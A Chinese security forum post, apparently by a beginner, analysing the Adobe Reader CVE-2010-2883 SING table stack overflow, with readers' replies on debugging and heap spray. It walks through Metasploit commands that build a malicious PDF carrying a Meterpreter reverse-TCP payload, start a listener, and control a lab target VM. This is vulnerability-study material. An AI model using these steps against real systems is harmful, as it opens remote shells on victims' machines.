首页
社区
课程
招聘
漏洞战争CVE-2010-2883 小白分析 望大佬指点迷津
发表于: 2018-11-19 17:52 11052

漏洞战争CVE-2010-2883 小白分析 望大佬指点迷津

2018-11-19 17:52
11052

Adobe Reader TTF字体SING表栈溢出漏洞


CVE-2010-2883漏洞利用(Kali虚拟机)

    1. 打开Kali系统,输入指令msfconsole


    2. 指令 search cve-2010-2883 


    3.获取主机ip

       打开命令行窗口 指令 ifconfig



    4. 指令 use exploit/windows/fileformat/adobe_cooltype_sing

        (使用此漏洞模块)

        指令 set payload windows/meterpreter/reverse_tcp

        (调用meterpreter载荷,反向连接到渗透机)

        指令 set lhost 192.168.117.134

        (设置主机ip)

        指令 set FILENAME CVE-2010-2883.pdf

        (设置漏洞利用文件名)

        指令 show options

        (查看选项)


        指令 exploit

        (生成漏洞利用文件)



    5. Metasploit开启shell监听会话,等待肉鸡上线

        指令 use exploit/multi/handler

        (使用handler监听模块)

        指令 set payload windows/meterpreter/reverse_tcp

        (回弹一个tcp连接)

        指令 set lhost 192.168.117.134

        (设置监听ip地址)

        指令 show options

        (查看设置选项)


        exploit

        (开启监听,等待回连)


    6. 在目标靶机内装载AdobeReader 9.3

    7. 将生成的CVE-2010-2883.pdf(漏洞利用文件)拷贝至目标靶机,使用Adobe Reader打开此文件

    8. 靶机出现卡顿的情况(此时靶机正在与主机进行连接)

    9. 回到主机,发现此时已经成功与靶机进行了连接


    10. 指令 dir (查看靶机目录文件)


         指令 mkdir aaa (在靶机当前目录下创建文件夹)


         指令 screenshot (靶机截图)



POC样本解析


网上下裁PDFStreamDumper解析PDF工具


使用PDFStreamDumper打开Poc样本(注:此poc样本为漏洞战争附属资料——名企面试自助手册)



[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课

上传的附件:
收藏
免费 2
支持
分享
最新回复 (6)
雪    币: 3850
活跃值: (292)
能力值: ( LV4,RANK:50 )
在线值:
发帖
回帖
粉丝
2
你好,我调试了附件。OD加载后,在0803DDAB 下断点(F2、内存、硬件断点)都试了,每次都是停在下面的地方,在strcat函数处断不下来,请问如何下断点呢?我调试的现象如下:
01008842    CC              int3
01008843    CC              int3
01008844    CC              int3
01008845    CC              int3
01008846    CC              int3
01008847    CC              int3
01008848    CC              int3
01008849    CC              int3
0100884A    CC              int3
0100884B    CC              int3
0100884C    CC              int3
0100884D    CC              int3
0100884E    CC              int3
0100884F    CC              int3

2018-12-13 17:10
1
雪    币: 3500
活跃值: (820)
能力值: ( LV7,RANK:100 )
在线值:
发帖
回帖
粉丝
3
dodohit 你好,我调试了附件。OD加载后,在0803DDAB 下断点(F2、内存、硬件断点)都试了,每次都是停在下面的地方,在strcat函数处断不下来,请问如何下断点呢?我调试的现象如下: 01008842 ...
请开启OD的忽略异常机制


2018-12-14 08:54
1
雪    币: 5640
活跃值: (8043)
能力值: ( LV15,RANK:531 )
在线值:
发帖
回帖
粉丝
4
关于第一个和第二个问题,虽然我没有研究过,但是你可以尝试删除或者修改这些值再调试看看有什么变化然后再分析,也许仍然会成功利用也许不会,只看着它们然后干想肯定是不知道原因的;关于第三个问题,拿到完整的exp可以把堆喷的部分删掉,只保留触发漏洞的部分便于分析具体漏洞成因。
2018-12-17 11:49
2
雪    币: 73
活跃值: (156)
能力值: ( LV5,RANK:60 )
在线值:
发帖
回帖
粉丝
5
attach到调试进程后,Adobe reader会抛出几个异常。不用管直接shift+F9,就会到断点
2019-7-23 21:57
0
雪    币: 146
活跃值: (62)
能力值: ( LV3,RANK:20 )
在线值:
发帖
回帖
粉丝
6
第一个问题和第二个问题我懒得看了,但你说的第三个也就是怎么回溯栈溢出的问题则是比较棘手的,栈溢出的时候可能栈没有完全被破坏,如果没有完全被破环的话可尝试从未破坏的地方去回溯,如果栈被完全破坏的话就尝试分析软件的运行流程以及调用模块,查看是哪一个模块出的问题,之后再详细分析是哪一个函数导致的问题,利用流行的插桩工具覆盖率对比并配合自己的经验判断应该能很快确定,这个受软件RE水平的影响,当然也有可能有更先进的方法。
2019-9-27 23:16
0
雪    币: 38
活跃值: (25)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
7
1 && 2 堆喷 内存布局
3 把堆喷代码去掉,只保留漏洞触发的代码 然后去调试就好了
2019-10-8 11:46
0
游客
登录 | 注册 方可回帖
返回